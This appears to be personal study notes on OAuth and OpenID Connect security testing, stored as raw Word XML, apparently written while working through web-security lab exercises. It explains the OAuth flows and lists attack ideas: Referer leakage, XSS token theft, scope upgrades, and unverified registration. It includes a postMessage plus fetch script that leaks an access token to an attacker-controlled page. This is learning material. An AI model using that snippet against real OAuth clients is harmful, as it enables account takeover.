      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">evil for implicit grant for putting fragments as query parameter</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Check if an image url from evil site fires a request including the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Referer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> header with query string revealing the token</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using xss to steal the token/code</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50" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="216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postMessage function if used can be used to send message to any origin if * is used in 3rd argument  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">arent.postMessage({type: 'onload', data: window.location.href},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2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">then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2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt; window.addEventListener('message', function(e) { fetch("/" + encodeURIComponent(e.data.data)) }, false) &lt;/script&gt;</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token request containing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Authorization code flow:  wider permission like profile, openid,  email in the post request. This happens after the code is being shared with different permission and access to the token has different permission and is not validated for the scope while fetching the token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Implicit flow: Use scope param to add additional permission with the token. OAuth service's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/userinfo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint, manually adding a new </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scope</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter in the process. Sometimes they are not checked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Unverified user registration with Oauth is possible or not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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50" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="144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if possible then user can register on the email that they don’t have and use the client application which is using the same oAuth service without any problem</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Authorization Request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ourier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="5c5c5b"/>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https://oauth-0ad100f503d8a6a38123f5ce029f0038.oauth-server.net/auth?</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client_id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=z41fnkmc3skprekrkm3mf&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="ffc000" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">redirect_uri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=https://0a9b00530394a6ec811df73a00b700ac.web-security-academy.net/oauth-callback&amp;</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response_type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=token&amp;</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=1767142462&amp;</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scope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=openid%20profile%20email</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ourier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="5c5c5b"/>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ourier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="5c5c5b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pP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2. User Login and consent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1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="5c5c5b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Authorization code grant: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consents to the requested access, their browser will be redirected to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/callback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endpoint that was specified in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">redirect_uri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parameter of the authorization request. This will result in GET request with param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26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /callback?code=a1b2c3d4e5f6g7h8&amp;state=ae13d489bd00e3c24 HTTP/1.1 Host: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
            <w:b w:val="0"/>
            <w:i w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="0563c1"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">client-app.com</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Access Token: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client application receives the authorization code, it request for access token.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 /token HTTP/1.1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 oauth-authorization-server.com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client_id=12345&amp;client_secret=SECRET&amp;redirect_uri=</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https://client-app.com/callback&amp;grant_type=authorization_code&amp;code=a1b2c3d4e5f6g7h8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319"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Access token grant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319"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OAuth service will validate the access token request. If everything is as expected, the server responds by granting the client application an access token with the requested scope.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 "access_token": "z0y9x8w7v6u5", "token_type": "Bearer", "expires_in": 3600, "scope": "openid profile", …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319"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319"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API call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Now the client application has the access code, it can finally fetch the user's data from the resource server. To do this, it makes an API call to the OAuth service's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/userinfo</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endpoint. The access token is submitted in the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Authorization: Bearer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header to prove that the client application has permission to access this data.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GET /userinfo HTTP/1.1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Host: oauth-resource-server.com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26"/>
          <w:szCs w:val="26"/>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Authorization: Bearer </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">z0y9x8w7v6u5</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319" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>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spacing w:after="319" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ha5d64gitq1d" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenId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0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenID Connect claims and scopes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">claims are key value pair</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">scope are the name given to group of claims. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e.g. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>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profile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ID token: is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> response type. This returns a JSON web token (JWT) signed with a JSON web signature (JWS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the basic oAuth, the data is share with the api using the token/code but in OpenId data is sent just after user is authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.well-known/jwks.json </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identification of OpenId usage in the application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check if openID parameter is present in any of the request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">change the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">response_type</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and check if the error occurs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check for configuration </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
